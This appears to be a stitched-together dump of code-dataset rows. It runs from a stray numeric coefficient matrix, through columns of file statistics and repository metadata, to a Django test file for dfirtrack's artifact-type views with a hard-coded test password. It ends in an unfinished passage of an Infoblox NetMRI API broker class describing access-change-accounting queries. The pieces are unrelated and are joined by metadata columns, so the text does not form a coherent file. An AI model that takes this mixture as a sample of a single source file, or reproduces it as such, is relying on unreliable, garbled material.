[ 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 0, 0, 6,-6, 0, 0,-4,-2, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 4,-4, 0, 0,-4, 4, 0, 0, 2, 2, 0, 0,-2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 0, 0, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4,-2, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0,-3, 3, 0, 0,-2,-1, 0, 0,-2,-1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4,-4, 0, 0,-4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0,-2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 2,-2, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0],
[-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 0,-2, 0, 4, 0, 2, 0,-3, 0, 3, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 0,-2, 0, 4, 0, 2, 0,-3, 0, 3, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0,-2, 0,-1, 0],
[18,-18,-18,18,-18,18,18,-18,12, 6,-12,-6,-12,-6,12, 6,12,-12, 6,-6,-12,12,-6, 6, 9,-9,-9, 9, 9,-9,-9, 9, 8, 4, 4, 2,-8,-4,-4,-2, 6, 3,-6,-3, 6, 3,-6,-3, 6,-6, 3,-3, 6,-6, 3,-3, 4, 2, 2, 1, 4, 2, 2, 1],
[-12,12,12,-12,12,-12,-12,12,-6,-6, 6, 6, 6, 6,-6,-6,-8, 8,-4, 4, 8,-8, 4,-4,-6, 6, 6,-6,-6, 6, 6,-6,-4,-4,-2,-2, 4, 4, 2, 2,-3,-3, 3, 3,-3,-3, 3, 3,-4, 4,-2, 2,-4, 4,-2, 2,-2,-2,-1,-1,-2,-2,-1,-1],
[ 4, 0,-4, 0,-4, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 0,-2, 0,-2, 0, 2, 0,-2, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,-4, 0,-4, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 0,-2, 0,-2, 0, 2, 0,-2, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0],
[-12,12,12,-12,12,-12,-12,12,-8,-4, 8, 4, 8, 4,-8,-4,-6, 6,-6, 6, 6,-6, 6,-6,-6, 6, 6,-6,-6, 6, 6,-6,-4,-2,-4,-2, 4, 2, 4, 2,-4,-2, 4, 2,-4,-2, 4, 2,-3, 3,-3, 3,-3, 3,-3, 3,-2,-1,-2,-1,-2,-1,-2,-1],
[ 8,-8,-8, 8,-8, 8, 8,-8, 4, 4,-4,-4,-4,-4, 4, 4, 4,-4, 4,-4,-4, 4,-4, 4, 4,-4,-4, 4, 4,-4,-4, 4, 2, 2, 2, 2,-2,-2,-2,-2, 2, 2,-2,-2, 2, 2,-2,-2, 2,-2, 2,-2, 2,-2, 2,-2, 1, 1, 1, 1, 1, 1, 1, 1]])
# vim: set notw
| 179.742857
| 207
| 0.335956
| 4,106
| 12,582
| 1.029469
| 0.004871
| 1.317246
| 1.842441
| 2.318429
| 0.985806
| 0.984623
| 0.969955
| 0.958599
| 0.927845
| 0.918855
| 0
| 0.468394
| 0.288348
| 12,582
| 69
| 208
| 182.347826
| 0.003686
| 0.001033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015152
| 0
| 0.015152
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
4c7929a4977b67918a633d7f8bdd7366644d4cdc
| 8,295
|
py
|
Python
|
dfirtrack_artifacts/tests/artifacttype/test_artifacttype_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 4
|
2020-03-06T17:37:09.000Z
|
2020-03-17T07:50:55.000Z
|
dfirtrack_artifacts/tests/artifacttype/test_artifacttype_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | null | null | null |
dfirtrack_artifacts/tests/artifacttype/test_artifacttype_views.py
|
blackhatethicalhacking/dfirtrack
|
9c2e13015291f2981d14d63c9683e7c447e91f3a
|
[
"MIT"
] | 1
|
2020-03-06T20:54:52.000Z
|
2020-03-06T20:54:52.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_artifacts.models import Artifacttype
import urllib.parse
class ArtifacttypeViewTestCase(TestCase):
""" artifacttype view tests """
@classmethod
def setUpTestData(cls):
# create object
Artifacttype.objects.create(artifacttype_name='artifacttype_1')
# create user
test_user = User.objects.create_user(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
def test_artifacttype_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/artifacts/artifacttype/', safe='')
# get response
response = self.client.get('/artifacts/artifacttype/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_artifacttype_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifacttype_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_list.html')
def test_artifacttype_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_artifacttype')
def test_artifacttype_detail_not_logged_in(self):
""" test detail view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/', safe='')
# get response
response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_artifacttype_detail_logged_in(self):
""" test detail view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifacttype_detail_template(self):
""" test detail view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_detail.html')
def test_artifacttype_detail_get_user_context(self):
""" test detail view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/detail/' + str(artifacttype_1.artifacttype_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_artifacttype')
def test_artifacttype_create_not_logged_in(self):
""" test create view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/artifacts/artifacttype/create/', safe='')
# get response
response = self.client.get('/artifacts/artifacttype/create/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_artifacttype_create_logged_in(self):
""" test create view """
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/create/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifacttype_create_template(self):
""" test create view """
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/create/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_add.html')
def test_artifacttype_create_get_user_context(self):
""" test create view """
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/create/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_artifacttype')
def test_artifacttype_update_not_logged_in(self):
""" test update view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/', safe='')
# get response
response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_artifacttype_update_logged_in(self):
""" test update view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifacttype_update_template(self):
""" test update view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_artifacts/artifacttype/artifacttype_edit.html')
def test_artifacttype_update_get_user_context(self):
""" test update view """
# get object
artifacttype_1 = Artifacttype.objects.get(artifacttype_name='artifacttype_1')
# login testuser
login = self.client.login(username='testuser_artifacttype', password='5HxLPaA1wWbphTcd2C3S')
# get response
response = self.client.get('/artifacts/artifacttype/update/' + str(artifacttype_1.artifacttype_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_artifacttype')
| 43.203125
| 146
| 0.683062
| 834
| 8,295
| 6.604317
| 0.077938
| 0.050835
| 0.081699
| 0.066812
| 0.909949
| 0.881082
| 0.870552
| 0.862564
| 0.835694
| 0.813907
| 0
| 0.017422
| 0.204219
| 8,295
| 191
| 147
| 43.429319
| 0.816997
| 0.118023
| 0
| 0.54321
| 0
| 0
| 0.227362
| 0.162521
| 0
| 0
| 0
| 0
| 0.197531
| 1
| 0.209877
| false
| 0.160494
| 0.049383
| 0
| 0.271605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
91274be755aa99e6f40c07675e6ec3bddee8779a
| 69,350
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/access_change_accounting_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/access_change_accounting_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/access_change_accounting_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class AccessChangeAccountingBroker(Broker):
controller = "access_change_accountings"
def show(self, **kwargs):
"""Shows the details for the specified access change accounting.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element.
:type AccessChangeAccountingID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accounting: The access change accounting identified by the specified AccessChangeAccountingID.
:rtype access_change_accounting: AccessChangeAccounting
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available access change accountings. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element.
:type AccessChangeAccountingID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device for which we count the access statistics.
:type DeviceID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the access change accountings as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` AccessChangeAccountingID
:param sort: The data field(s) to use for sorting the output. Default is AccessChangeAccountingID. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AccessChangeAccounting. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accountings: An array of the AccessChangeAccounting objects that match the specified input criteria.
:rtype access_change_accountings: Array of AccessChangeAccounting
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available access change accountings matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAChangedCols: The fields that changed between this revision of the record and the previous revision.
:type ACAChangedCols: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAEndTime: The ending effective time of this record, or empty if still in effect.
:type ACAEndTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAFirstSeenTime: The timestamp of when NetMRI recorded its first access statistic for this device.
:type ACAFirstSeenTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACAStartTime: The starting effective time of this record.
:type ACAStartTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ACATimestamp: The date and time this record was collected or calculated.
:type ACATimestamp: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element.
:type AccessChangeAccountingID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device for which we count the access statistics.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterAdded: The number of rules added by provisioning with NetMRI (including rollback operations).
:type FilterAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterAll: The number of all rules defined in the device's configuration.
:type FilterAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterRemoved: The number of rules removed by provisioning with NetMRI (including remediation).
:type FilterRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetAdded: The number of rule lists added by provisioning with NetMRI.
:type FilterSetAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetAll: The number of all rule lists defined in the device's configuration.
:type FilterSetAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetRemoved: The number of rule lists removed by provisioning with NetMRI (including remediation).
:type FilterSetRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterSetUnused: The number of unused rule lists defined in the device's configuration.
:type FilterSetUnused: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterUnused: The number of unused rules defined in the device's configuration.
:type FilterUnused: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectAdded: The number of network objects added by provisioning with NetMRI.
:type IPObjectAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectAll: The number of network objects defined in the device's configuration.
:type IPObjectAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectRemoved: The number of network objects removed by provisioning with NetMRI (including remediation).
:type IPObjectRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPObjectUnused: The number of network objects defined in the device's configuration that are not used in the configuration.
:type IPObjectUnused: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceAdded: The number of service objects added by provisioning with NetMRI.
:type ServiceAdded: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceAll: The number of service objects defined in the device's configuration.
:type ServiceAll: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceRemoved: The number of service objects removed by provisioning with NetMRI (including remediation).
:type ServiceRemoved: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ServiceUnused: The number of service objects defined in the device's configuration that are not used in the configuration.
:type ServiceUnused: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the access change accountings as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` AccessChangeAccountingID
:param sort: The data field(s) to use for sorting the output. Default is AccessChangeAccountingID. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AccessChangeAccounting. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against access change accountings, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: ACAChangedCols, ACAEndTime, ACAFirstSeenTime, ACAStartTime, ACATimestamp, AccessChangeAccountingID, DataSourceID, DeviceID, FilterAdded, FilterAll, FilterRemoved, FilterSetAdded, FilterSetAll, FilterSetRemoved, FilterSetUnused, FilterUnused, IPObjectAdded, IPObjectAll, IPObjectRemoved, IPObjectUnused, ServiceAdded, ServiceAll, ServiceRemoved, ServiceUnused.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accountings: An array of the AccessChangeAccounting objects that match the specified input criteria.
:rtype access_change_accountings: Array of AccessChangeAccounting
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available access change accountings matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: ACAChangedCols, ACAEndTime, ACAFirstSeenTime, ACAStartTime, ACATimestamp, AccessChangeAccountingID, DataSourceID, DeviceID, FilterAdded, FilterAll, FilterRemoved, FilterSetAdded, FilterSetAll, FilterSetRemoved, FilterSetUnused, FilterUnused, IPObjectAdded, IPObjectAll, IPObjectRemoved, IPObjectUnused, ServiceAdded, ServiceAll, ServiceRemoved, ServiceUnused.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACAChangedCols: The operator to apply to the field ACAChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAChangedCols: If op_ACAChangedCols is specified, the field named in this input will be compared to the value in ACAChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAChangedCols must be specified if op_ACAChangedCols is specified.
:type val_f_ACAChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAChangedCols: If op_ACAChangedCols is specified, this value will be compared to the value in ACAChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAChangedCols must be specified if op_ACAChangedCols is specified.
:type val_c_ACAChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
